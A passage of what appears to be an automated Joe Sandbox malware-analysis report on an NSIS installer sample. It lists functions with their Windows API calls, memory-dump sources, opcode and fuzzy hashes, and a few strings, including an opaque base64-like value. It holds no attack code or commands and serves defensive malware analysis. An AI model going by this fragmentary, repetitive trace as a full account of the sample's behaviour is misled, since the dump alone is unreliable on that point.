                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                                                                                  • Opcode ID: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                  • Instruction ID: 75174e167af6e085340da124bff1779b24b122a40ba15240be09f0de69b02ea8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12D05E70B042056BC700EF78D808A1B7AF9AB90744F40C43CA985C3240FA74D8018B96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                  • Opcode ID: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                                                                                                                                  • Instruction ID: dd570ae04773ec1d9248e7accc602cb5589f5768ce779b06ba6b6fcb8a9dd89b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F0F8B05047049AC320BF789D4841A76A8AB81329BA44B3DF5B4E62E0D73894628B6A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
• Instruction ID: c8608c254b430b602e84f9c27618fc09d2b238f80b7c42c251c9764424cdbd58
• Opcode Fuzzy Hash: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
• Instruction Fuzzy Hash: C9D067B45043049FD300FF6CD54970ABBE4AB44344F80C828E98897251D679D4548B96
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFileAttributesA.KERNEL32 ref: 00401855
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
• Instruction ID: 66959b0bba6a1c3021cfc6ef215295b74c1233013eb20c9b72e5f533845a5747
• Opcode Fuzzy Hash: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
• Instruction Fuzzy Hash: 33D0A7B010C201DED3006F248C0053BB6F4AF84300F20863DF0C6A31E4C334C8836B2A
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: MessageSend$Window$ClipboardShow$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleItemLockMetricsOpenSystemThreadTrackUnlock
• String ID:
• API String ID: 1085758737-0
• Opcode ID: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
• Instruction ID: 5e12382b9bf781896070c4bfdd92391929ae8e3bc4ad132af5f990d2ac7018d8
• Opcode Fuzzy Hash: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
• Instruction Fuzzy Hash: BAF1E5B0908304AFD710EF68D98866EBFF4FF84314F41892DE89997291D7789885CF96
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32 ref: 00402A22
• MultiByteToWideChar.KERNEL32(00000000), ref: 00402B6F
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID: 4A
• API String ID: 123533781-205151761
• Opcode ID: ca4e342dd9a4d1c448b3aa248cf2cd94cc217ce03813331fd364ede4b0128604
• Instruction ID: d305ef95405f15bde97fa7dd711ba6fc9ffd0a80db07f91d6d56198472658b67
• Opcode Fuzzy Hash: ca4e342dd9a4d1c448b3aa248cf2cd94cc217ce03813331fd364ede4b0128604
• Instruction Fuzzy Hash: 51614CB0A087119FD710EF69C9886AABBF4FF88314F008AADE58897391D7749885CF55
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ItemMessageSendWindow$ClassDestroyDialogEnableLongMenuShowText
                                                                                                                                                                                                                                  • String ID: NSIS Software Setup
                                                                                                                                                                                                                                  • API String ID: 1257292352-2653429224
                                                                                                                                                                                                                                  • Opcode ID: 292bb44675ccfa867acd3725238b8a77fc34fda148f2e8f9fca479e34ef56d7c
                                                                                                                                                                                                                                  • Instruction ID: 81f075938f45a7985b655ae660e62a259a3a74716ec96c8beebe6fa6edba758e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 292bb44675ccfa867acd3725238b8a77fc34fda148f2e8f9fca479e34ef56d7c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B12EDB0904700EFD720AF69D98876FBBF4EB84714F50893EE88497290D7789885DF5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: MessageSend$Item$Cursor$ButtonCheckColorExecuteShell
• String ID: #
• API String ID: 3348721118-1885708031
• Opcode ID: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
• Instruction ID: 44f7cc544d88e5f9b0c99828474254857af221e4d6201ddb95d9c50adba5cc38
• Opcode Fuzzy Hash: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
• Instruction Fuzzy Hash: A5B1E7B0908704AFD710AF69D58876EBBF0FF44314F40892DE889A7381D779A885CF96
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: CreateIndirectRect$BeginBrushClientColorDeleteFillFontModeObjectPaintProcTextWindow
• String ID: NSIS Software Setup
• API String ID: 2207649800-2653429224
• Opcode ID: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
• Instruction ID: 8fd51326f023e27f82ac7456779bc240a2534a06902e8bdd8a27472bfc587b1b
• Opcode Fuzzy Hash: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
• Instruction Fuzzy Hash: 046115B09047089FCB24DFA9C9885AEBBF8FF88310F50892EE499D7251D734A845DF56
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
  • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00408822), ref: 00408383
• GetShortPathNameA.KERNEL32 ref: 0040839D
  • Part of subcall function 004079B4: lstrlenA.KERNEL32 ref: 004079CC
  • Part of subcall function 004079B4: lstrcmpiA.KERNEL32 ref: 004079F4
• GetShortPathNameA.KERNEL32 ref: 004083C8
• wsprintfA.USER32 ref: 004083FF
• GetFileSize.KERNEL32 ref: 0040845A
• GlobalAlloc.KERNEL32 ref: 00408476
• ReadFile.KERNEL32(?,?), ref: 004084A2
• SetFilePointer.KERNEL32 ref: 00408568
  • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
  • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
• WriteFile.KERNEL32 ref: 0040858B
• GlobalFree.KERNEL32 ref: 00408597
• CloseHandle.KERNEL32(?,?), ref: 004085A1
Similarity
• API ID: File$Handle$CloseGlobalNamePathShort$AddressAllocAttributesCreateFreeModulePointerProcReadSizeWritelstrcmpilstrlenwsprintf
• String ID:
• API String ID: 1472977481-0
• Opcode ID: 13db83d6b791d1ca6467b22e5dc8b14e389eea567c2d00f0c859e75bf8b65817
• Instruction ID: 94d356f40ec1d5b6b18a4eade4987fc681b306d1f2835a3a3d653d78bc44f301
• Opcode Fuzzy Hash: 13db83d6b791d1ca6467b22e5dc8b14e389eea567c2d00f0c859e75bf8b65817
• Instruction Fuzzy Hash: 70710AB0908305AFD710AF65DA8866FBBF4FF84704F50C82EE9C497251DB789445CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 00405CAA
• SetWindowTextA.USER32 ref: 00405CE6
  • Part of subcall function 00407805: GetDlgItemTextA.USER32 ref: 00407829
  • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
  • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
  • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
  • Part of subcall function 00407D37: CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
• GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00405FAC
• MulDiv.KERNEL32 ref: 00405FD2
Strings
• A, xrefs: 00405DE1
• 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00405C60
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Char$Next$ItemText$DiskFreePrevSpaceWindow
• String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$A
• API String ID: 2917460849-2103090652
• Opcode ID: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
• Instruction ID: 826313f772001043a55ea6ee256f7e169a774654cc20dc23f9f2a1aa091d3067
• Opcode Fuzzy Hash: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
• Instruction Fuzzy Hash: 5FD128B09087049FDB10EF69D58466EBBF4FF44304F51893EE888A7281D7789985CF9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenA.KERNEL32(?,?), ref: 00407EE6
• GetVersion.KERNEL32 ref: 00407F25
• GetSystemDirectoryA.KERNEL32 ref: 00407FC6
• GetWindowsDirectoryA.KERNEL32 ref: 00407FEC
• SHGetSpecialFolderLocation.SHELL32 ref: 00408018
• SHGetPathFromIDListA.SHELL32 ref: 00408073
• CoTaskMemFree.OLE32 ref: 00408084
  • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
Strings
• ., xrefs: 00407F41
• 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 0040809D
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrlenwsprintf
• String ID: .$62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
• API String ID: 3880481140-1911195491
• Opcode ID: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
• Instruction ID: afc503830e017d1618816f2a7c40fbe451ee37b9332185e2dde12f9a903aaa14
• Opcode Fuzzy Hash: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
• Instruction Fuzzy Hash: FB918E71D082149FDB20DF69C9846AEBBF4EF48300F55853EE894A7381D738A845CB9B
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
• Instruction ID: 1780d8928a2120b8c11af9b20abdfd96f0510a7958c84a0cc1c987df9bbb4b6c
• Opcode Fuzzy Hash: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
• Instruction Fuzzy Hash: DF3128B09047069BDB10DFA8D988A6BBFE4BF48314F04886DFD94DB251D374D941CB66
Uniqueness
Uniqueness Score: -1.00%

APIs
• DeleteFileA.KERNEL32(74DF05F0), ref: 004034EF
• GlobalAlloc.KERNEL32 ref: 0040351C
• CloseHandle.KERNEL32 ref: 00403653
  • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
  • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
• GlobalAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403561
• GlobalFree.KERNEL32 ref: 004035D6
• WriteFile.KERNEL32 ref: 00403606
• GlobalFree.KERNEL32 ref: 00403612
  • Part of subcall function 00403D52: SetFilePointer.KERNEL32 ref: 00403D89
  • Part of subcall function 00403D52: ReadFile.KERNEL32 ref: 00403DD5
                                                                                                                                                                                                                                    • Part of subcall function 00403D52: ReadFile.KERNEL32 ref: 00403E9A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: File$Global$Read$AllocFreePointer$CloseDeleteHandleWrite
• String ID:
• API String ID: 2143033257-0
• Opcode ID: 0aa6d49e2075d0b495ce51cdb1172a2f07b07b4f6215442dff9fb3ed0ec64bc4
• Instruction ID: 4c510bf6e2d4d1f92ab55f121e890243c90c0ce65b69a7146e7506ad40f7442f
• Opcode Fuzzy Hash: 0aa6d49e2075d0b495ce51cdb1172a2f07b07b4f6215442dff9fb3ed0ec64bc4
• Instruction Fuzzy Hash: 51510BB0A087009FD710EF29C844B6EBBF4AF84315F01896EE598E7391D7389985CF56
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CapsCreateDeviceFontIndirectwsprintf
• String ID: H$Z
• API String ID: 1586071882-4221459494
• Opcode ID: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
• Instruction ID: fe53f9027c55cc81bf00ecbd586396b11bfc2b5e7faefd45710aa59a0b9b721a
• Opcode Fuzzy Hash: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
• Instruction Fuzzy Hash: AC218CB29092009FD310BF68DD446AABBF8FB89304F04C97EE088E3251C3B84555CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32 ref: 00403A17
• GetTickCount.KERNEL32 ref: 00403A48
• wsprintfA.USER32 ref: 00403A83
  • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
• CreateDialogParamA.USER32 ref: 00403AC3
• ShowWindow.USER32 ref: 00403ADC
  • Part of subcall function 0040392C: MulDiv.KERNEL32 ref: 00403953
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSendWindow$CountCreateDestroyDialogParamShowTextTickwsprintf
• String ID: o
• API String ID: 2510787843-252678980
• Opcode ID: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
• Instruction ID: 81059e3b479639814b0572c15c12751123e1a1ca33ddd0d88914a755a74492f9
• Opcode Fuzzy Hash: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
• Instruction Fuzzy Hash: CB21FCB06083059FD710AF65E58875A7FE8FB44309F40843EE4C5A72A1DB798585CF9A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                  • Opcode ID: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                  • Instruction ID: 922df396bf3e7088f2107368fcd68d656d94b82640ce54d584134d1287f84c7b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E2117B0804308EFDB10AFA9D88829EBFF4EF84314F00C91EE99557281D7B98459CF96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: TextTimerWindowwsprintf
                                                                                                                                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                                  • API String ID: 2438957755-1158693248
                                                                                                                                                                                                                                  • Opcode ID: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                  • Instruction ID: 5883a2093b31581e9909bbd4cee83827143d54294f5a20fab69da977af55eaa0
